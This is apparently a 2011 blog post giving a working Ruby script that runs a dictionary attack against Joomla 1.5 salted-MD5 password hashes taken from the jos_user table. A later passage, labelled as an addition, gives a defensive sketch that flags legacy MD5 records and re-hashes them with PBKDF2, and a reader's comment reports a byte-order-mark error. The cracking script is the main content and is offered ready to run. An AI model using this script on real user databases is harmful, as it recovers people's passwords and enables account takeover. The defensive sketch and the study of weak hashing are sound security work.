Tuesday, August 2, 2011

Simple Joomla Password "Cracker"

Joomla uses a simple MD5 cryptographic hash function to create and store users' passwords. For security reasons, one of the inputs to this function is a random salt. However, this salt is stored in the jos_user table (by default), together with the generated hash.

Once in possession of this information, it is possible to perform a dictionary attack against these hashes using a simple Ruby script to recover users' passwords.

The first parameter is the dictionary file and the second is the hash file in the following format: user;hash;salt

Tested on Joomla Version 1.5.23


#!/usr/bin/env ruby
# First parameter: dictionary file. Second parameter: hash file.
# Each line of the hash file has the form: user;hash;salt
require 'digest/md5'

# Joomla hash as described above: hex MD5 of the password followed by the salt.
def generateJoomlaHash(pKey, pSalt)
  return Digest::MD5.hexdigest(pKey + pSalt)
end

# True when the candidate key produces the stored hash for this salt.
def JoomlaCrack(key, hash, salt)
  return generateJoomlaHash(key, salt) == hash
end

def run(fDic, fHash)
  founds = Hash.new()
  fDic.each do |key|
    key = key.chomp
    # File.foreach closes the hash file after each pass.
    File.foreach(fHash) do |line|
      name, hash, salt = line.chomp.split(';')
      # Skip blank or malformed lines and users already found.
      next if name.nil? || hash.nil? || salt.nil?
      next if founds.include?(name)
      if JoomlaCrack(key, hash, salt)
        puts "#{name}:#{key}"
        founds[name] = key
      end
    end
  end
  fDic.close
  # puts founds.inspect
end

fDic = File.open(ARGV[0], 'r')
fHash = ARGV[1]

run(fDic, fHash)
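
The defensive counterpart to the weakness described above, as an added example that is not part of the original post and not Joomla's own code: it flags records in the same user;hash;salt format that still hold a bare MD5 hash, and re-hashes a record with PBKDF2-HMAC-SHA256 the next time its password verifies. The `pbkdf2-sha256$<iterations>$<hex>` field layout, the iteration count and all function names are assumptions made for this sketch.

```ruby
require 'digest/md5'
require 'openssl'
require 'securerandom'

ITERATIONS = 200_000 # assumed work factor; tune to your hardware

# Legacy scheme described in this post: hex MD5 over password + salt.
def legacy_hash(password, salt)
  Digest::MD5.hexdigest(password + salt)
end

def pbkdf2_hex(password, salt, iterations)
  OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, 32,
                             OpenSSL::Digest.new('SHA256')).unpack1('H*')
end

# Constant-time string comparison.
def secure_eq(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Users in a "user;hash;salt" export whose hash is still bare 32-hex MD5.
def legacy_users(lines)
  lines.map { |l| l.chomp.split(';', 3) }
       .select { |_, hash, _| hash.to_s.match?(/\A\h{32}\z/) }
       .map(&:first)
end

# Check a login against one "user;hash;salt" record. Returns [ok, record];
# a legacy record that verifies comes back re-hashed (assumed layout):
# "user;pbkdf2-sha256$<iterations>$<hex>;<new salt>".
def verify_and_upgrade(password, record, iterations = ITERATIONS)
  user, hash, salt = record.chomp.split(';', 3)
  return [false, record] unless hash && salt
  if hash.start_with?('pbkdf2-sha256$')
    _, iter, hex = hash.split('$')
    return [secure_eq(pbkdf2_hex(password, salt, iter.to_i), hex.to_s), record]
  end
  return [false, record] unless secure_eq(legacy_hash(password, salt), hash)
  new_salt = SecureRandom.hex(16)
  new_hash = pbkdf2_hex(password, new_salt, iterations)
  [true, "#{user};pbkdf2-sha256$#{iterations}$#{new_hash};#{new_salt}"]
end

# Constructed sample record (not real data).
SAMPLE = "alice;#{legacy_hash('sunshine', 'c0nstructedsalt')};c0nstructedsalt"
```

Records that never log in again keep their MD5 hash, so `legacy_users` is the list to force through a password reset.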

1 comment:

محمد said...

jm.rb:1: Invalid char `\357' in expression
jm.rb:1: Invalid char `\273' in expression
jm.rb:1: Invalid char `\277' in expression